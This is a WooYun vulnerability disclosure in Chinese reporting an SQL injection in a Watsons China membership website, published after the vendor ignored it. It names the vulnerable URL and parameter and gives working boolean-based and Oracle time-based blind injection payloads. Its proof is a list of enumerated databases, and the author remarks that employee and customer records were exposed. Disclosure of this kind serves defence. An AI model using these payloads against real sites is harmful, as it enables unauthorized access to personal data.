漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-070920
漏洞标题:屈臣氏SQL注射可能影响大量数据库
相关厂商:屈臣氏
漏洞作者: 紫霞仙子
提交时间:2014-08-04 11:09
修复时间:2014-09-18 11:16
公开时间:2014-09-18 11:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
昨天陪女朋友去屈臣氏买东西,付款时,竟然有会员卡。。。。。
详细说明:
一个单引号引发的血案。
https://www.vip.watsons.com.cn/web/SubClub_CosmeticDetail.do?articleId= (GET)
Parameter: articleId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=6290' AND 7401=7401 AND 'GKJL'='GKJL
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: articleId=6290' AND 6552=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USE
RS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'kIVc'='kIVc
---
漏洞证明:
available databases [12]:
[*] ANSO**
[*] CRMP**
[*] CTXS**
[*] EXFS**
[*] JEREM**
[*] MDS**
[*] OLAPS**
[*] PENN**
[*] RONN**
[*] SURV**
[*] SYS
[*] SYSTEM
表太多,就不上图了。看了下,员工信息,客户信息等等等,太多太多。。。。
修复方案:
赶紧修改吧。吓死人的节奏。
版权声明:转载请注明来源 紫霞仙子@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝